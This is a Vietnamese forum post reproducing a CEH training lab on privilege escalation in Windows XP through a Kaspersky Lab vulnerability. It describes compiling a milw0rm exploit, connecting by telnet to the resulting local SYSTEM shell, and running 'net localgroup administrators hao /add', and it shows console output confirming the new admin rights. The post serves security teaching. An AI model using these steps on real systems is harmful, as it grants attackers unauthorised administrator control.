Quản trị net diễn đàn chia sẻ thông tin các thủ thuật mạng, internet bảo mật thông tin dành cho giới IT VIệt hy vọng là nơi bổ ích cho cộng đồng

Quản trị net diễn đàn chia sẻ thông tin các thủ thuật mạng, internet bảo mật thông tin dành cho giới IT VIệt hy vọng là nơi bổ ích cho cộng đồng (http://quantrinet.com/forum/index.php)
-   Module 5: System Hacking (http://quantrinet.com/forum/forumdisplay.php?f=173)
-   -   Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab (http://quantrinet.com/forum/showthread.php?t=3622)

hoctinhoc 23-09-2009 04:17 AM
Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab
 

Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab

Đối với việc nâng quyền trong một hệ thống hacker phải lợi dụng lỗ hổng nào đó, hoặc là từ hệ điều hành, hoặc là từ những phần mềm của hãng thứ 3, trong trường hợp này, chúng ta nâng quyền thông qua phần mềm diệt Virus là Kaspersky Lab. Để chuẩn bị bài lab này, chúng ta lên trang web www.milw0rm.com để tìm thông tin về đoạn mã khai thác này.

http://kythuatvien.com/forum/forum_images/wol_error.gifHình ảnh này đã bị thu nhỏ. Nhấp vào hình để xem kính thước thật (556x260).http://www.kythuatvien.com/forum/upl..._025157_GF.jpg
Sau đó ta sử dụng đoạn code này biên dịch thày file exe để tấn công vào máy nạn nhân. Để thực hành bài Lab, ta cần phải cài phần mềm Kaspersky vào máy. Sau khi cài xong ta thêm vào máy 1 user bình thường,và tiến hành log on vào user này, Trong bài ta sử dụng user hao và password là hao.
http://kythuatvien.com/forum/forum_images/wol_error.gifHình ảnh này đã bị thu nhỏ. Nhấp vào hình để xem kính thước thật (659x409).http://www.kythuatvien.com/forum/upl..._025244_GF.jpg

Chạy file exe đã được biên dịch để exploit vào Kaspersky đang chạy dưới quyền admin hệ thống.

http://kythuatvien.com/forum/forum_images/wol_error.gifHình ảnh này đã bị thu nhỏ. Nhấp vào hình để xem kính thước thật (657x298).http://www.kythuatvien.com/forum/upl..._025352_GF.jpg

Sử dụng lệnh “ telnet 127.0.0.1 8080 “ để truy xuất vào shell có quyền admin hệ thống. Ta tiếp tục sử dụng lệnh “ Net Localgroup administrators hao /add” để add user “ hao” vào nhóm admin, và sử dụng lệnh net user để tái xác nhận


Trích dẫn:
  1. Microsoft Windows XP [Version 5.1.2600]

  2. (C) Copyright 1985-2001 Microsoft Corp.


  4. D:\WINDOWS\system32>

  5. D:\WINDOWS\system32>net Localgroup administrators hao /add

  6. net Localgroup administrators hao /add

  7. The command completed successfully.

  8. D:\WINDOWS\system32>net user hao

  9. net user hao

  10. User name hao

  11. Full Name

  12. Comment

  13. User's comment

  14. Country code 000 (System Default)

  15. Account active Yes

  16. Account expires Never

  17. Password last set 8/3/2007 1:47 PM

  18. Password expires 9/15/2007 12:35 PM

  19. Password changeable 8/3/2007 1:47 PM

  20. Password required Yes

  21. Giáo trình bài tập C|EH Tài liệu dành cho học viên

  22. VSIC Education Corporation Trang 25

  23. User may change password Yes

  24. Workstations allowed All

  25. Logon script

  26. User profile

  27. Home directory

  28. Last logon 8/3/2007 1:54 PM

  29. Logon hours allowed All

  30. Local Group Memberships *Administrators *Users

  31. Global Group memberships *None

  32. The command completed successfully.

  33. D:\WINDOWS\system32>





Ta thấy user “ hao” bây giờ đã có quyền Admin trong hệ thống, và việc nâng quyền đã thành công. Các bạn có thể test những phần mềm tường tự từ code down từ trang www.milw0rm.com.

Theo VSIC Education Corporation

:battay:

http://quantrinet.com/ads/quantrinet1.png


Bây giờ là 06:26 AM. Giờ GMT +7

Diễn đàn tin học QuantriNet
quantrinet.com | quantrimang.co.cc
Founded by Trương Văn Phương | Developed by QuantriNet's members.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.